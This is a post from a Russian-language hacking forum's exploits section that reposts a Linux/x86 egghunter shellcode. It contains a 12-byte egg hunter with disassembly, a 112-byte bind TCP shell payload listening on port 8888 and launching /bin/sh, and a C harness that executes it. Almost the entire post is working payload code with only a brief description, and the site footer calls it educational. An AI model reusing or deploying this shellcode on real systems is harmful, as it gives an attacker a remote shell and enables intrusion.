XDNET
Вернуться   Hacket.Ru - Ethical Hacking - Cyber Security - Penetration Testing > UNDERGROUND > Этичный Хакинг и Пентестинг > "Exploits", "Shells", "Injections"

"Exploits", "Shells", "Injections" эксплуатация узвимостей

Ответ
Опции просмотра Опции темы  
Старый 30.01.2018, 01:24   #1
Модератор lvl1
 
Аватар для Mishlen
Группа: Moder
 
Регистрация: 08.12.2017
Адрес: antichat.ru
Сообщений: 85
Репутация: 40
По умолчанию Linux/x86 Egghunter Shellcode

12 bytes small Linux/x86 egghunter shellcode.
tags | x86, shellcode
systems | linux

Код:
/*
Title: Linux/x86 - EggHunter Shellcode (12 Bytes)
Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes
Date : 14/Jan/2018
Author: Nipun Jaswal (@nipunjaswal) ; SLAE-1080
 
Details:
1. Works with an executable EGG
2. Make sure you clear EDX, EAX registers in the shellcode before any other operations
*/
/*
 
EGG Hunter Disassembly:
Disassembly of section .text:
 
08048060 <_start>:
 8048060:   ba 90 47 90 4f          mov    edx,0x4f904790
 
08048065 <loop>:
 8048065:   40                      inc    eax
 8048066:   39 10                   cmp    DWORD PTR [eax],edx
 8048068:   75 fb                   jne    8048065 <loop>
 804806a:   ff e0                   jmp    eax
*/
#include <stdio.h>
#include <string.h>
#define EXECEGG "\x90\x47\x90\x4f" //Executable EGG
 
unsigned char egg_hunter[] = \
"\xba\x90\x47\x90\x4f\x40\x39\x10\x75\xfb\xff\xe0"; //EggHunter 12 Bytes
unsigned char egg[] = \
EXECEGG
// Bind TCP Shell 112 Bytes Port 8888
"\x31\xdb\x31\xc0\xb0\x66\xfe\xc3\x56\x6a\x01\x6a"
"\x02\x89\xe1\xcd\x80\x97\x56\x66\x68\x22\xb8\x66"
"\x6a\x02\x89\xe3\x6a\x10\x53\x57\x31\xdb\xf7\xe3"
"\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x56\x57\x31\xdb"
"\xf7\xe3\xb0\x66\xb3\x04\x89\xe1\xcd\x80\x31\xdb"
"\xf7\xe3\x56\x56\x57\xb0\x66\xb3\x05\x89\xe1\xcd"
"\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79"
"\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80";
void main()
{
    printf("Length of Egg Hunter Shellcode:  %d\n", strlen(egg_hunter));
    printf("Length of the Actual Shellcode:  %d\n", strlen(egg));
    int (*ret)() = (int(*)())egg_hunter;
    ret();
}
.txt
[Ссылки могут видеть только зарегистрированные пользователи. ]
Mishlen вне форума   Ответить с цитированием
Ответ

Метки
linux/x86 egghunter shellcode


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Друзья

Текущее время: 03:15. Часовой пояс GMT +4.


"(c) Hacket.Ru" (c) Hacket.Ru Внимание! Все материалы, находящиеся на сайте, выложены исключительно в образовательных целях. Владельцы сайта не несут ответственность за использование информации в незаконных целях.
Мы не несём никакой ответственности за предоставленные материалы. При копировании информации обратная ссылка обязательна.
Powered by: vBulletin Version 3.8.1
Copyright ©2000 - 2017, vBulletin Solutions, Inc ~ Перевод: zCarot
Remix fluid style from X1mer@ for Hacket.Ru Взлом и Безопасность (c) Hacket.Ru
Время генерации страницы 0.07694 секунды с 14 запросами